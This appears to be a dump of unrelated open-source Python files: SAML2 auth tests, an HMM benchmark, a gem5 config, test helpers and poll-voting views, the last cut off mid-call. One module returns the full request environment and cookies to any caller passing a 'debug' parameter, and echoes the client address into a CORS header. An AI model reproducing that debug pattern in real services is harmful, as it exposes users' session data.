class DummySAML2Provider(SAML2Provider):
def get_saml_setup_pipeline(self):
return []
def build_config(self, state):
return dummy_provider_config
@pytest.mark.skipif(not HAS_SAML2, reason="SAML2 library is not installed")
class AuthSAML2Test(AuthProviderTestCase):
provider = DummySAML2Provider
provider_name = "saml2_dummy"
def setUp(self):
self.user = self.create_user("rick@onehundredyears.com")
self.org = self.create_organization(owner=self.user, name="saml2-org")
# enable require 2FA and enroll user
TotpInterface().enroll(self.user)
self.org.update(flags=models.F("flags").bitor(Organization.flags.require_2fa))
assert self.org.flags.require_2fa.is_set
self.auth_provider = AuthProvider.objects.create(
provider=self.provider_name, config=dummy_provider_config, organization=self.org
)
# The system.url-prefix, which is used to generate absolute URLs, must
# have a TLD for the SAML2 library to consider the URL generated for
# the ACS endpoint valid.
self.url_prefix = settings.SENTRY_OPTIONS.get("system.url-prefix")
settings.SENTRY_OPTIONS.update({"system.url-prefix": "http://testserver.com"})
super(AuthSAML2Test, self).setUp()
def tearDown(self):
# restore url-prefix config
settings.SENTRY_OPTIONS.update({"system.url-prefix": self.url_prefix})
super(AuthSAML2Test, self).tearDown()
@fixture
def login_path(self):
return reverse("sentry-auth-organization", args=["saml2-org"])
@fixture
def acs_path(self):
return reverse("sentry-auth-organization-saml-acs", args=["saml2-org"])
@fixture
def setup_path(self):
return reverse("sentry-organization-auth-provider-settings", args=["saml2-org"])
def test_redirects_to_idp(self):
resp = self.client.post(self.login_path, {"init": True})
assert resp.status_code == 302
redirect = urlparse(resp.get("Location", ""))
query = parse_qs(redirect.query)
assert redirect.path == "/sso_url"
assert "SAMLRequest" in query
def accept_auth(self, **kargs):
saml_response = self.load_fixture("saml2_auth_response.xml")
saml_response = base64.b64encode(saml_response).decode("utf-8")
# Disable validation of the SAML2 mock response
is_valid = "onelogin.saml2.response.OneLogin_Saml2_Response.is_valid"
with mock.patch(is_valid, return_value=True):
return self.client.post(self.acs_path, {"SAMLResponse": saml_response}, **kargs)
def test_auth_sp_initiated(self):
# Start auth process from SP side
self.client.post(self.login_path, {"init": True})
auth = self.accept_auth()
assert auth.status_code == 200
assert auth.context["existing_user"] == self.user
def test_auth_idp_initiated(self):
auth = self.accept_auth()
assert auth.status_code == 200
assert auth.context["existing_user"] == self.user
@mock.patch("sentry.auth.helper.logger")
def test_auth_setup(self, auth_log):
self.auth_provider.delete()
self.login_as(self.user)
data = {"init": True, "provider": self.provider_name}
with Feature(["organizations:sso-basic", "organizations:sso-saml2"]):
setup = self.client.post(self.setup_path, data)
assert setup.status_code == 302
redirect = urlparse(setup.get("Location", ""))
assert redirect.path == "/sso_url"
auth = self.accept_auth(follow=True)
messages = map(lambda m: six.text_type(m), auth.context["messages"])
assert len(messages) == 2
assert messages[0] == "You have successfully linked your account to your SSO provider."
assert messages[1].startswith("SSO has been configured for your organization")
# require 2FA disabled when saml is enabled
org = Organization.objects.get(id=self.org.id)
assert not org.flags.require_2fa.is_set
event = AuditLogEntry.objects.get(
target_object=org.id, event=AuditLogEntryEvent.ORG_EDIT, actor=self.user
)
assert "require_2fa to False when enabling SSO" in event.get_note()
auth_log.info.assert_called_once_with(
"Require 2fa disabled during sso setup", extra={"organization_id": self.org.id}
)
def test_auth_idp_initiated_no_provider(self):
self.auth_provider.delete()
auth = self.accept_auth(follow=True)
assert auth.status_code == 200
messages = map(lambda m: six.text_type(m), auth.context["messages"])
assert len(messages) == 1
assert messages[0] == "The organization does not exist or does not have SAML SSO enabled."
def test_saml_metadata(self):
path = reverse("sentry-auth-organization-saml-metadata", args=["saml2-org"])
resp = self.client.get(path)
assert resp.status_code == 200
assert resp.get("content-type") == "text/xml"
def test_logout_request(self):
saml_request = self.load_fixture("saml2_slo_request.xml")
saml_request = base64.b64encode(saml_request)
self.login_as(self.user)
path = reverse("sentry-auth-organization-saml-sls", args=["saml2-org"])
path = path + "?" + urlencode({"SAMLRequest": saml_request})
resp = self.client.get(path)
assert resp.status_code == 302
redirect = urlparse(resp.get("Location", ""))
query = parse_qs(redirect.query)
assert redirect.path == "/slo_url"
assert "SAMLResponse" in query
updated = type(self.user).objects.get(pk=self.user.id)
assert updated.session_nonce != self.user.session_nonce
|
beeftornado/sentry
|
tests/sentry/web/frontend/test_auth_saml2.py
|
Python
|
bsd-3-clause
| 6,945
|
"""
A script for testing / benchmarking HMM Implementations
"""
import argparse
import collections
import logging
import time
import hmmlearn.hmm
import numpy as np
import sklearn.base
LOG = logging.getLogger(__file__)
class Benchmark:
def __init__(self, repeat, n_iter, verbose):
self.repeat = repeat
self.n_iter = n_iter
self.verbose = verbose
def benchmark(self, sequences, lengths, model, tag):
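        # Time `repeat` independent fits; sklearn.base.clone returns an unfitted
        # copy of `model`, so one run cannot warm-start the next.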
elapsed = []
for i in range(self.repeat):
start = time.time()
cloned = sklearn.base.clone(model)
cloned.fit(sequences, lengths)
end = time.time()
elapsed.append(end-start)
self.log_one_run(start, end, cloned, tag)
return np.asarray(elapsed)
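    # Hooks overridden by the concrete benchmark classes below
    # (Gaussian, Multinomial, multivariate Gaussian, GMM).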
def generate_training_sequences(self):
pass
def new_model(self, implementation):
pass
def run(self, results_file):
runtimes = collections.defaultdict(dict)
sequences, lengths = self.generate_training_sequences()
for implementation in ["scaling", "log"]:
model = self.new_model(implementation)
LOG.info(f"{model.__class__.__name__}: testing {implementation}")
key = f"{model.__class__.__name__}|EM|hmmlearn-{implementation}"
elapsed = self.benchmark(sequences, lengths, model, key)
runtimes[key]["mean"] = elapsed.mean()
runtimes[key]["std"] = elapsed.std()
with open(results_file, mode="w") as fd:
fd.write("configuration,mean,std,n_iterations,repeat\n")
for key, value in runtimes.items():
fd.write(f"{key},{value['mean']},{value['std']},"
f"{self.n_iter},{self.repeat}\n")
def log_one_run(self, start, end, model, tag):
LOG.info(f"Training Took {end-start} seconds {tag}")
LOG.info(f"startprob={model.startprob_}")
LOG.info(f"transmat={model.transmat_}")
class GaussianBenchmark(Benchmark):
def new_model(self, implementation):
return hmmlearn.hmm.GaussianHMM(
n_components=4,
n_iter=self.n_iter,
covariance_type="full",
implementation=implementation,
verbose=self.verbose
)
def generate_training_sequences(self):
sampler = hmmlearn.hmm.GaussianHMM(
n_components=4,
covariance_type="full",
init_params="",
verbose=self.verbose
)
sampler.startprob_ = np.asarray([0, 0, 0, 1])
sampler.transmat_ = np.asarray([
[.2, .2, .3, .3],
[.3, .2, .2, .3],
[.2, .3, .3, .2],
[.3, .3, .2, .2],
])
sampler.means_ = np.asarray([
-1.5,
0,
1.5,
3
]).reshape(4, 1)
sampler.covars_ = np.asarray([
.5,
.5,
.5,
.5
]).reshape(4, 1, 1,)
sequences, states = sampler.sample(50000)
lengths = [len(sequences)]
return sequences, lengths
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"means={model.means_}")
LOG.info(f"covars={model.covars_}")
class MultinomialBenchmark(Benchmark):
def new_model(self, implementation):
return hmmlearn.hmm.MultinomialHMM(
n_components=3,
n_iter=self.n_iter,
verbose=self.verbose,
implementation=implementation
)
def generate_training_sequences(self):
sampler = hmmlearn.hmm.MultinomialHMM(n_components=3)
sampler.startprob_ = np.array([0.6, 0.3, 0.1])
sampler.transmat_ = np.array([[0.6, 0.2, 0.2],
[0.3, 0.5, 0.2],
[0.4, 0.3, 0.3]])
sampler.emissionprob_ = np.array([
[.1, .5, .1, .3],
[.1, .2, .4, .3],
[0, .5, .5, .0],
])
sequences, states = sampler.sample(50000)
lengths = [len(sequences)]
return sequences, lengths
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"emissions={model.emissionprob_}")
class MultivariateGaussianBenchmark(GaussianBenchmark):
def generate_training_sequences(self):
sampler = hmmlearn.hmm.GaussianHMM(
n_components=4,
covariance_type="full",
init_params=""
)
sampler.startprob_ = np.asarray([0, 0, 0, 1])
sampler.transmat_ = np.asarray([
[.2, .2, .3, .3],
[.3, .2, .2, .3],
[.2, .3, .3, .2],
[.3, .3, .2, .2],
])
sampler.means_ = np.asarray([
[-1.5, 0],
[0, 0],
[1.5, 0],
[3, 0]
])
sampler.covars_ = np.asarray([
[[.5, 0],
[0, .5]],
[[.5, 0],
[0, 0.5]],
[[.5, 0],
[0, .5]],
[[0.5, 0],
[0, 0.5]],
])
observed, hidden = sampler.sample(50000)
lengths = [len(observed)]
return observed, lengths
class GMMBenchmark(GaussianBenchmark):
def generate_training_sequences(self):
sampler = hmmlearn.hmm.GMMHMM(
n_components=4,
n_mix=3,
covariance_type="full",
init_params=""
)
sampler.startprob_ = [.25, .25, .25, .25]
sampler.transmat_ = [
[.1, .3, .3, .3],
[.3, .1, .3, .3],
[.3, .3, .1, .3],
[.3, .3, .3, .1],
]
sampler.weights_ = [
[.2, .2, .6],
[.6, .2, .2],
[.2, .6, .2],
[.1, .1, .8],
]
sampler.means_ = np.asarray([
[[-10], [-12], [-9]],
[[-5], [-4], [-3]],
[[-1.5], [0], [1.5]],
[[5], [7], [9]],
])
sampler.covars_ = np.asarray([
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
[[[.125]], [[.125]], [[.125]]],
])
n_sequences = 10
length = 5_000
sequences = []
for i in range(n_sequences):
sequences.append(sampler.sample(5000)[0])
return np.concatenate(sequences), [length] * n_sequences
def new_model(self, implementation):
return hmmlearn.hmm.GMMHMM(
n_components=4,
n_mix=3,
n_iter=self.n_iter,
covariance_type="full",
verbose=self.verbose,
implementation=implementation
)
def log_one_run(self, start, end, model, tag):
super().log_one_run(start, end, model, tag)
LOG.info(f"weights_={model.weights_}")
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--all", action="store_true")
parser.add_argument("--categorical", action="store_true")
parser.add_argument("--gaussian", action="store_true")
parser.add_argument("--multivariate-gaussian", action="store_true")
parser.add_argument("--gaussian-mixture", action="store_true")
parser.add_argument("--repeat", type=int, default=10)
parser.add_argument("--verbose", action="store_true")
parser.add_argument("--n-iter", type=int, default=100)
args = parser.parse_args()
if args.all:
args.categorical = True
args.gaussian = True
args.multivariate_gaussian = True
args.gaussian_mixture = True
if args.categorical:
bench = MultinomialBenchmark(
repeat=args.repeat,
n_iter=args.n_iter,
verbose=args.verbose,
)
bench.run("categorical.benchmark.csv")
if args.gaussian:
bench = GaussianBenchmark(
repeat=args.repeat,
n_iter=args.n_iter,
verbose=args.verbose,
)
bench.run("gaussian.benchmark.csv")
if args.multivariate_gaussian:
bench = MultivariateGaussianBenchmark(
repeat=args.repeat,
n_iter=args.n_iter,
verbose=args.verbose,
)
bench.run("multivariate_gaussian.benchmark.csv")
if args.gaussian_mixture:
bench = GMMBenchmark(
repeat=args.repeat,
n_iter=args.n_iter,
verbose=args.verbose,
)
bench.run("gmm.benchmark.csv")
if __name__ == "__main__":
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.DEBUG
)
main()
|
hmmlearn/hmmlearn
|
scripts/benchmark.py
|
Python
|
bsd-3-clause
| 8,715
|
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Steve Reinhardt
import m5
from m5.objects import *
m5.util.addToPath('../configs/common')
import FSConfig
# --------------------
# Base L1 Cache
# ====================
class L1(BaseCache):
hit_latency = '1ns'
response_latency = '1ns'
block_size = 64
mshrs = 4
tgts_per_mshr = 8
is_top_level = True
# ----------------------
# Base L2 Cache
# ----------------------
class L2(BaseCache):
block_size = 64
hit_latency = '10ns'
response_latency = '10ns'
mshrs = 92
tgts_per_mshr = 16
write_buffers = 8
# ---------------------
# I/O Cache
# ---------------------
class IOCache(BaseCache):
assoc = 8
block_size = 64
hit_latency = '50ns'
response_latency = '50ns'
mshrs = 20
size = '1kB'
tgts_per_mshr = 12
addr_ranges = [AddrRange(0, size='8GB')]
forward_snoops = False
is_top_level = True
#cpu
cpus = [ TimingSimpleCPU(cpu_id=i) for i in xrange(2) ]
#the system
system = FSConfig.makeLinuxAlphaSystem('timing')
system.iocache = IOCache()
system.iocache.cpu_side = system.iobus.master
system.iocache.mem_side = system.membus.slave
system.cpu = cpus
#create the l1/l2 bus
system.toL2Bus = CoherentBus()
#connect up the l2 cache
system.l2c = L2(size='4MB', assoc=8)
system.l2c.cpu_side = system.toL2Bus.master
system.l2c.mem_side = system.membus.slave
#connect up the cpu and l1s
for c in cpus:
c.addPrivateSplitL1Caches(L1(size = '32kB', assoc = 1),
L1(size = '32kB', assoc = 4))
# create the interrupt controller
c.createInterruptController()
# connect cpu level-1 caches to shared level-2 cache
c.connectAllPorts(system.toL2Bus, system.membus)
c.clock = '2GHz'
root = Root(full_system=True, system=system)
m5.ticks.setGlobalFrequency('1THz')
|
lastweek/gem5
|
tests/configs/tsunami-simple-timing-dual.py
|
Python
|
bsd-3-clause
| 3,357
|
#!/usr/bin/env python
import os
import json
class TermiteCore:
def __init__( self, request, response ):
self.request = request
self.response = response
def GetConfigs( self ):
def GetServer():
return self.request.env['HTTP_HOST']
def GetDataset():
return self.request.application
def GetModel():
return self.request.controller
def GetAttribute():
return self.request.function
def GetDatasets( dataset ):
FOLDER_EXCLUSIONS = frozenset( [ 'admin', 'examples', 'welcome', 'init' ] )
applications_parent = self.request.env['applications_parent']
applications_path = '{}/applications'.format( applications_parent )
folders = []
for folder in os.listdir( applications_path ):
applications_subpath = '{}/{}'.format( applications_path, folder )
if os.path.isdir( applications_subpath ):
if folder not in FOLDER_EXCLUSIONS:
folders.append( folder )
folders = sorted( folders )
return folders
def GetModels( dataset, model ):
if dataset == 'init':
return None
app_data_path = '{}/data'.format( self.request.folder )
folders = []
for folder in os.listdir( app_data_path ):
app_data_subpath = '{}/{}'.format( app_data_path, folder )
if os.path.isdir( app_data_subpath ):
folders.append( folder )
folders = sorted( folders )
return folders
def GetAttributes( dataset, model, attribute ):
if dataset == 'init':
return None
if model == 'default':
return None
if model == 'lda':
return [
'DocIndex',
'TermIndex',
'TopicIndex',
'TermTopicMatrix',
'DocTopicMatrix',
'TopicCooccurrence'
]
elif model == 'corpus':
return [
'DocMeta',
'TermFreqs',
'TermCoFreqs'
]
else:
return []
server = GetServer()
dataset = GetDataset()
datasets = GetDatasets( dataset )
model = GetModel()
models = GetModels( dataset, model )
attribute = GetAttribute()
attributes = GetAttributes( dataset, model, attribute )
configs = {
'server' : server,
'dataset' : dataset,
'datasets' : datasets,
'model' : model,
'models' : models,
'attribute' : attribute,
'attributes' : attributes
}
return configs
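    # Illustrative (hypothetical) result: for a web2py request routed as
    # http://localhost:8075/mydataset/lda/TermTopicMatrix, GetConfigs() would return
    # roughly:
    #   { 'server': 'localhost:8075', 'dataset': 'mydataset', 'datasets': [...],
    #     'model': 'lda', 'models': [...], 'attribute': 'TermTopicMatrix',
    #     'attributes': [ 'DocIndex', 'TermIndex', ... ] }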
def IsDebugMode( self ):
return 'debug' in self.request.vars
def IsJsonFormat( self ):
return 'format' in self.request.vars and 'json' == self.request.vars['format'].lower()
def GenerateResponse( self, params = {}, keysAndValues = {} ):
if self.IsDebugMode():
return self.GenerateDebugResponse()
else:
return self.GenerateNormalResponse( params, keysAndValues )
def GenerateDebugResponse( self ):
def GetEnv( env ):
data = {}
for key in env:
value = env[key]
if isinstance( value, dict ) or \
isinstance( value, list ) or isinstance( value, tuple ) or \
isinstance( value, str ) or isinstance( value, unicode ) or \
isinstance( value, int ) or isinstance( value, long ) or isinstance( value, float ) or \
value is None or value is True or value is False:
data[ key ] = value
else:
data[ key ] = 'N/A'
return data
info = {
'env' : GetEnv( self.request.env ),
'cookies' : self.request.cookies,
'vars' : self.request.vars,
'get_vars' : self.request.get_vars,
'post_vars' : self.request.post_vars,
'folder' : self.request.folder,
'application' : self.request.application,
'controller' : self.request.controller,
'function' : self.request.function,
'args' : self.request.args,
'extension' : self.request.extension,
'now' : str( self.request.now )
}
return json.dumps( info, encoding = 'utf-8', indent = 2, sort_keys = True )
def GenerateNormalResponse( self, params, keysAndValues = {} ):
data = {
'params' : params,
'configs' : self.GetConfigs()
}
data.update( keysAndValues )
dataStr = json.dumps( data, encoding = 'utf-8', indent = 2, sort_keys = True )
# Workaround while we build up the server-client architecture
self.response.headers['Access-Control-Allow-Origin'] = 'http://' + self.request.env['REMOTE_ADDR'] + ':8080'
if self.IsJsonFormat():
return dataStr
else:
data[ 'content' ] = dataStr
return data
|
jyt109/termite-data-server
|
server_src/modules/core.py
|
Python
|
bsd-3-clause
| 4,206
|
from .common import * # noqa
LANGUAGE_CODE = 'nb'
|
devilry/trix2
|
trix/project/develop/settings/develop.py
|
Python
|
bsd-3-clause
| 57
|
# -*- coding: utf-8 -*-
import base64
import inspect
import json
import logging
import requests
import types
from django.conf import settings
from django.core.management import call_command
from django_nose import FastFixtureTestCase
from functools import wraps
from mock import patch
from tastypie.test import ResourceTestCase, TestApiClient
from rpc_proxy.proxies import get_setting
INITIAL_DATA = ('initial_data',)
TEST_DATA = ('test_data',)
logger = logging.getLogger(__name__)
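# mock_request routes outgoing `requests` HTTP calls back into Tastypie's test
# client (authenticated as the configured superuser), so proxy tests exercise
# the API without touching the network.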
def mock_request(obj, method, url, **kwargs):
client = TestApiClient()
authentication = 'Basic %s' % base64.b64encode(':'.join([
get_setting('SUPERUSER_USERNAME', None),
get_setting('SUPERUSER_PASSWORD', None),
]))
if method == 'GET':
data = kwargs.get('params', {})
djresponse = client.get(url, data=data, authentication=authentication)
elif method == 'POST':
data = json.loads(kwargs.get('data', '{}'))
djresponse = client.post(url, data=data, authentication=authentication)
elif method == 'PUT':
data = json.loads(kwargs.get('data', '{}'))
djresponse = client.put(url, data=data, authentication=authentication)
elif method == 'PATCH':
data = json.loads(kwargs.get('data', '{}'))
djresponse = client.patch(url, data=data, authentication=authentication)
elif method == 'DELETE':
data = kwargs.get('params', {})
djresponse = client.delete(url, data=data, authentication=authentication)
# convert django.http.HttpResponse to requests.models.Response
response = requests.models.Response()
response.status_code = djresponse.status_code
response.headers = {}
try:
response.headers['content-type'] = djresponse['content-type']
response.headers['location'] = djresponse['location']
except:
pass
response.encoding = requests.utils.get_encoding_from_headers(response.headers)
response._content = djresponse.content
return response
def mock_cache_set(key, value, timeout=None):
# do nothing
pass
def mock_api(func, **decorator_kwargs):
@patch('requests.sessions.Session.request', mock_request)
@patch('tastypie.cache.SimpleCache.set', mock_cache_set)
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
class TestCase(FastFixtureTestCase):
"""
Don't be smart in test cases!
"""
fixtures = INITIAL_DATA
def __new__(cls, name):
testcase = super(TestCase, cls).__new__(cls)
if get_setting('API_URL', None):
try:
func_type = types.UnboundMethodType
except:
func_type = types.FunctionType
for name, func in inspect.getmembers(testcase):
if isinstance(func, func_type) and name.startswith('test_'):
setattr(testcase, name, mock_api(func))
return testcase
def setUp(self):
call_command('loaddata', *TEST_DATA)
super(TestCase, self).setUp()
class Proxy(TestCase):
"""
Don't be smart in test cases!
CAVEAT: Proxy classes have to be imported within each test method
to mock the requests
"""
pass
|
nk113/tastypie-rpc-proxy
|
rpc_proxy/test.py
|
Python
|
bsd-3-clause
| 3,241
|
from hq.models import Domain
from xformmanager.models import FormDataColumn, FormDataGroup, FormDataPointer
from xformmanager.manager import *
from xformmanager.storageutility import StorageUtility
from receiver.models import Submission, Attachment
from receiver.tests.util import *
import logging
def clear_data():
"""Clear most of the data in the system: schemas,
submissions, and attachments. Useful in the
setup and/or teardown methods of tests.
"""
su = StorageUtility()
su.clear()
Submission.objects.all().delete()
Attachment.objects.all().delete()
def clear_group_data():
"""Clear out the form group objects"""
FormDataGroup.objects.all().delete()
FormDataColumn.objects.all().delete()
FormDataPointer.objects.all().delete()
def get_file(filename, path=None ):
""" handles relative pathing of files """
if not path:
path = os.path.dirname(__file__)
return os.path.join( path, filename )
def create_xsd_and_populate(xsd_file_name, xml_file_name='', domain=None, path=None):
if domain:
mockdomain = domain
elif Domain.objects.all().count() == 0:
mockdomain = Domain(name='mockdomain')
mockdomain.save()
else:
mockdomain = Domain.objects.all()[0]
formdefmodel = create_xsd(xsd_file_name, mockdomain, path=path)
populate(xml_file_name, mockdomain, path)
return formdefmodel
def create_xsd(xsd_file_name, domain=None, path=None):
    if xsd_file_name is None:
        return None
    if not path:
        path = os.path.dirname(__file__)
    xsd_file_path = os.path.join(path, xsd_file_name)
f = open(xsd_file_path,"r")
manager = XFormManager()
formdefmodel = manager.add_schema(xsd_file_name, f)
f.close()
# fake out the form submission
formdefmodel.submit_ip = '127.0.0.1'
formdefmodel.bytes_received = os.path.getsize(xsd_file_path)
formdefmodel.form_display_name = 'mock display name'
formdefmodel.domain = domain
formdefmodel.save()
return formdefmodel
def populate(xml_file_name, domain=None, path=None):
""" returns submission """
if xml_file_name:
return create_fake_submission(xml_file_name, domain, path)
def create_fake_submission(xml_file, domain, path=None):
if not path:
# can't use get_full_path on the body since it's not relative to that file
# the default assumes it's relative to this file
path = os.path.dirname(__file__)
full_body_path = os.path.join(path, xml_file)
submission = makeNewEntry(get_full_path('simple-meta.txt'), full_body_path, domain)
return submission
|
commtrack/commtrack-old-to-del
|
apps/xformmanager/tests/util.py
|
Python
|
bsd-3-clause
| 2,666
|
# -*- coding: utf-8 -*-
from expects import expect
from mamba import describe, context, before
from spec.ui._ipod_helpers import *
from spec.ui._fixture import update_environment
with describe('ipodio playlist create') as _:
@before.all
def setup_all():
_.new_name = 'leño'
_.playlist_name = 'playlist'
_.existing_name = 'roña'
update_environment(_)
bootstrap_ipod(_.mountpoint_path)
create_playlist(_.mountpoint_path, _.playlist_name)
create_playlist(_.mountpoint_path, _.existing_name)
def should_print_an_error():
execution = _.env.run(*_.cmd + ['playlist', 'rename'], expect_error=True)
expect(execution.stderr).to.have('Usage:')
with context('given a non existing playlist name'):
def should_print_an_error_():
execution = _.env.run(*_.cmd + ['playlist', 'rename', _.new_name, _.playlist_name])
expect(execution.stdout).to.have('does not exist')
with context('given an existing playlist name'):
def should_print_an_error__():
execution = _.env.run(*_.cmd + ['playlist', 'rename'], expect_error=True)
expect(execution.stderr).to.have('Usage:')
with context('given an existing playlist name'):
def should_print_an_error___():
execution = _.env.run(*_.cmd + ['playlist', 'rename', _.playlist_name, _.existing_name])
expect(execution.stdout).to.have('already exists')
with context('and another valid playlist name'):
def should_rename_that_playlist():
execution = _.env.run(*_.cmd + ['playlist', 'rename', _.playlist_name, _.new_name])
playlists = get_ipod_playlists_by_name(_.mountpoint_path)
expect(playlists).to.have(_.new_name)
expect(playlists).not_to.have(_.playlist_name)
expect(execution.stdout).to.have('renamed to')
|
jvrsantacruz/ipodio
|
spec/ui/playlist_rename_spec.py
|
Python
|
bsd-3-clause
| 1,953
|
from datetime import datetime, timedelta
from itertools import chain, cycle
from django.shortcuts import render_to_response
from django.utils.translation import ugettext, ugettext_lazy as _
from django.http import HttpResponseRedirect, Http404
from django import forms
from django.views.decorators.http import require_POST
from django.db import transaction
from django.contrib.contenttypes.models import ContentType
from django.template import RequestContext
from django.contrib.sites.models import Site
from django.template.defaultfilters import slugify
from django.utils.safestring import mark_safe
from django.utils.encoding import force_unicode
from django.contrib.formtools.wizard import FormWizard
from django.views.decorators.csrf import csrf_protect
from ella.core.cache import get_cached_object_or_404
from ella.core.views import get_templates_from_publishable
from ella_polls.models import Poll, Contestant, Survey
from ella_polls.conf import polls_settings
def get_next_url(request):
"""
Return URL for redirection
Try to get it from:
* POST param 'next'
* HTTP_REFERER
"""
if 'next' in request.POST: # and request.POST['next'].startswith('/'):
return request.POST['next']
else:
return request.META.get('HTTP_REFERER', '/')
def poll_check_vote(request, poll):
"""
    To avoid multiple poll votes by the same user.
    Uses sessions (authenticated users) or cookies (anonymous users) at first.
    Then it looks the vote up in Votes.
    Return choices:
    * User not yet voted
    * User just voted
    * User already voted
    * User tried to vote with no choice (useful to display a message in a Poll box)
"""
sess_jv = request.session.get(polls_settings.POLL_JUST_VOTED_COOKIE_NAME, [])
# removing just voted info from session
if poll.id in sess_jv:
del request.session[polls_settings.POLL_JUST_VOTED_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_JUST_VOTED
# removing no vote info from session
sess_nv = request.session.get(polls_settings.POLL_NO_CHOICE_COOKIE_NAME, [])
if poll.id in sess_nv:
del request.session[polls_settings.POLL_NO_CHOICE_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_NO_CHOICE
# authenticated user - check session
if request.user.is_authenticated():
sess = request.session.get(polls_settings.POLL_COOKIE_NAME, [])
if poll.id in sess:
return polls_settings.USER_ALLREADY_VOTED
# otherwise check Vote object - just for sure
if poll.check_vote_by_user(request.user):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
# anonymous - check cookie
else:
cook = request.COOKIES.get(polls_settings.POLL_COOKIE_NAME, '').split(',')
if str(poll.id) in cook:
return polls_settings.USER_ALLREADY_VOTED
ip_address = request.META['REMOTE_ADDR']
# otherwise check Vote object - just for sure
if poll.check_vote_by_ip_address(ip_address):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
def survey_check_vote(request, survey):
sess_jv = request.session.get(polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME, [])
# removing just voted info from session
if survey.id in sess_jv:
del request.session[polls_settings.SURVEY_JUST_VOTED_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_JUST_VOTED
# removing no vote info from session
sess_nv = request.session.get(polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME, [])
if survey.id in sess_nv:
del request.session[polls_settings.SURVEY_NO_CHOICE_COOKIE_NAME]
# TODO - del just my poll, not the entire list !
return polls_settings.USER_NO_CHOICE
# authenticated user - check session
if request.user.is_authenticated():
sess = request.session.get(polls_settings.SURVEY_COOKIE_NAME, [])
if survey.id in sess:
return polls_settings.USER_ALLREADY_VOTED
# otherwise check Vote object - just for sure
if survey.check_vote_by_user(request.user):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
# anonymous - check cookie
else:
cook = request.COOKIES.get(polls_settings.SURVEY_COOKIE_NAME, '').split(',')
if str(survey.id) in cook:
return polls_settings.USER_ALLREADY_VOTED
ip_address = request.META['REMOTE_ADDR']
# otherwise check Vote object - just for sure
if survey.check_vote_by_ip_address(ip_address):
return polls_settings.USER_ALLREADY_VOTED
return polls_settings.USER_NOT_YET_VOTED
@csrf_protect
@require_POST
@transaction.commit_on_success
def poll_vote(request, poll_id):
poll_ct = ContentType.objects.get_for_model(Poll)
poll = get_cached_object_or_404(poll_ct, pk=poll_id)
url = get_next_url(request)
# activity check
if not poll.is_active():
return HttpResponseRedirect(url)
# vote check
if poll_check_vote(request, poll) != polls_settings.USER_NOT_YET_VOTED:
return HttpResponseRedirect(url)
form = QuestionForm(poll.question)(request.POST)
# invalid input
if not form.is_valid():
# no choice selected error - via session
sess_nv = request.session.get(polls_settings.POLL_NO_CHOICE_COOKIE_NAME, [])
sess_nv.append(poll.id)
request.session[polls_settings.POLL_NO_CHOICE_COOKIE_NAME] = sess_nv
return HttpResponseRedirect(url)
# vote save
kwa = {}
if request.user.is_authenticated():
kwa['user'] = request.user
kwa['ip_address'] = request.META['REMOTE_ADDR']
poll.vote(form.cleaned_data['choice'], **kwa)
# just voted info session update
sess_jv = request.session.get(polls_settings.POLL_JUST_VOTED_COOKIE_NAME, [])
sess_jv.append(poll.id)
request.session[polls_settings.POLL_JUST_VOTED_COOKIE_NAME] = sess_jv
response = HttpResponseRedirect(url)
# authenticated user vote - session update
if request.user.is_authenticated():
sess = request.session.get(polls_settings.POLL_COOKIE_NAME, [])
sess.append(poll.id)
request.session[polls_settings.POLL_COOKIE_NAME] = sess
    # anonymous user vote - cookies update
else:
cook = request.COOKIES.get(polls_settings.POLL_COOKIE_NAME, '').split(',')
if len(cook) > polls_settings.POLL_MAX_COOKIE_LENGTH:
cook = cook[1:]
cook.append(str(poll.id))
expires = datetime.strftime(datetime.utcnow() + \
timedelta(seconds=polls_settings.POLL_MAX_COOKIE_AGE),
"%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie(
polls_settings.POLL_COOKIE_NAME,
value=','.join(cook),
max_age=polls_settings.POLL_MAX_COOKIE_AGE,
expires=expires,
path='/',
